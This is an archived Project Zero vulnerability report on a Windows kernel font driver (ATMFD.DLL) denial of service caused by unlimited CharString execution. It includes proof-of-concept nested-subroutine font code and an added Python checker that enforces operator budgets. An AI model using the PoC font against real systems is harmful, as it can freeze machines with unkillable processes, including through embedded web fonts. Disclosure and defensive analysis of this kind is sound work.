raghavmishra / google-security-research

Automatically exported from code.google.com/p/google-security-research

Windows Kernel ATMFD.DLL DoS via unlimited CharString program execution #169

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
The Adobe Type Manager Font Driver (ATMFD.DLL) used by the Windows kernel to 
handle Type1 (.PFB + .PFM) and OpenType (.OTF) fonts does not limit the number 
of state machine instructions which can be executed per glyph, while e.g. 
FreeType sets the maximum to 20'000'000.

By using multiple nested calls of subroutines and computationally expensive 
operations (such as drawing outlines), it is possible to cause ATMFD.DLL to get 
stuck in the main VM execution loop forever, thus consuming 100% of a single 
CPU (can be scaled to attack multiple CPUs) and implicitly creating an 
unkillable process.

The issue is reproducible with both Type-1 and OTF fonts on all Microsoft 
Windows editions (up to 8.1), regardless of bitness. The most obvious attack 
scenario would be to conduct the attack locally, but since CSS allows arbitrary 
OTF fonts to be embedded in websites, this can be potentially exploited in a 
remote manner in the context of browsers which use GDI for font rasterization. 
Other remote vectors (e.g. through PDF / Office documents) might also be 
viable, but have not been investigated.

The following CharString code causes 65536 drawing operations to be performed, 
which is sufficient to demonstrate the attack on any modern machine:

          <CharString index="40">
            -100 0 rmoveto 100 100 rlineto 0 -100 rlineto return
          </CharString>
          <CharString index="41">
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            return
          </CharString>
          <CharString index="42">
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            return
          </CharString>
          <CharString index="43">
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            return
          </CharString>
          <CharString index="44">
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            return
          </CharString>
[...]
        <CharString name="A">
          100 0 rmoveto -63 callsubr endchar
        </CharString>

Attached are the following POC files:

1) The source code of an OTF file (poc.ttx) and the resulting font (poc.otf) 
compiled with the "ttx" utility, a part of an open-source "fonttools" project 
(https://github.com/behdad/fonttools/).

2) The source code of a Type-1 font (poc.pfa) and the resulting font (poc.pfb, 
poc.pfm) compiled with the "type1" utility, a part of the "Adobe Font 
Development Kit for OpenType" software package 
(http://www.adobe.com/devnet/opentype/afdko/topic_overview.html).

Original issue reported on code.google.com by mjurc...@google.com on 14 Nov 2014 at 1:49

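The following Python is an added example, not code from the report, from ATMFD.DLL or from FreeType: a tiny Type 2 CharString interpreter that charges every executed operator against a budget (the kind of cap FreeType applies and the report says ATMFD lacks) and also enforces the Type 2 spec's subroutine nesting limit of 10. It runs the report's Subrs 40-44 and glyph "A" (subr index = operand + bias, 107 here, per the CFF spec); rmoveto/rlineto are simplified to a single (dx, dy) pair and hints are not modelled.

```python
class CharStringLimitExceeded(Exception):
    pass

OPS = {"rmoveto", "rlineto", "callsubr", "return", "endchar"}

def subr_bias(count):
    # CFF Type 2 rule: subr index = operand + bias (107 for fewer than 1240 subrs).
    return 107 if count < 1240 else 1131 if count < 33900 else 32768

def check_glyph(program, subrs, max_ops, max_depth=10):
    """Run a glyph under an operator budget and the Type 2 nesting limit of 10.
    Returns (accepted, operators executed, drawing operations)."""
    bias = subr_bias(len(subrs))
    counts = {"ops": 0, "draw": 0}  # charged at every nesting level, not reset per subr

    def run(prog, depth):  # returns True once endchar has been seen
        if depth > max_depth:
            raise CharStringLimitExceeded("subr nesting deeper than %d" % max_depth)
        stack = []
        for tok in prog.split():
            if tok not in OPS:
                stack.append(int(tok))  # operand
                continue
            counts["ops"] += 1
            if counts["ops"] > max_ops:
                raise CharStringLimitExceeded("operator budget of %d exhausted" % max_ops)
            if tok in ("rmoveto", "rlineto"):
                stack.clear()  # consume the (dx, dy) pair and draw
                counts["draw"] += 1
            elif tok == "callsubr":
                if run(subrs[stack.pop() + bias], depth + 1):
                    return True
            elif tok == "return":
                return False
            else:  # endchar ends the whole glyph
                return True
    try:
        run(program, 0)
        return True, counts["ops"], counts["draw"]
    except CharStringLimitExceeded:
        return False, counts["ops"], counts["draw"]

# Subrs 40-44 and glyph "A" as listed in the report (only these five subrs are held,
# bias is 107 either way): subr i calls subr i-1 sixteen times, so a nesting depth
# of only 5 (well within the spec's 10) fans out to 16**4 = 65536 leaf executions.
SUBRS = {40: "-100 0 rmoveto 100 100 rlineto 0 -100 rlineto return"}
for i in range(41, 45):
    SUBRS[i] = " ".join(["%d callsubr" % (i - 1 - 107)] * 16) + " return"
GLYPH_A = "100 0 rmoveto -63 callsubr endchar"
```

A depth check alone accepts this glyph; `check_glyph(GLYPH_A, SUBRS, 20_000_000)` returns `(True, 336420, 196609)`, while a budget of 20_000 rejects it after 20001 operators.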
GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 14 Nov 2014 at 2:01

GoogleCodeExporter commented 9 years ago
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without 
a broadly available patch, then the bug report will automatically become 
visible to the public.

Original comment by mjurc...@google.com on 18 Nov 2014 at 11:44

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 4 Dec 2014 at 4:37

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 11 Dec 2014 at 10:16

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 24 Mar 2015 at 10:06

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 1 Apr 2015 at 12:11

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 20 Apr 2015 at 2:07

GoogleCodeExporter commented 9 years ago

Original comment by mjurc...@google.com on 12 Jun 2015 at 4:02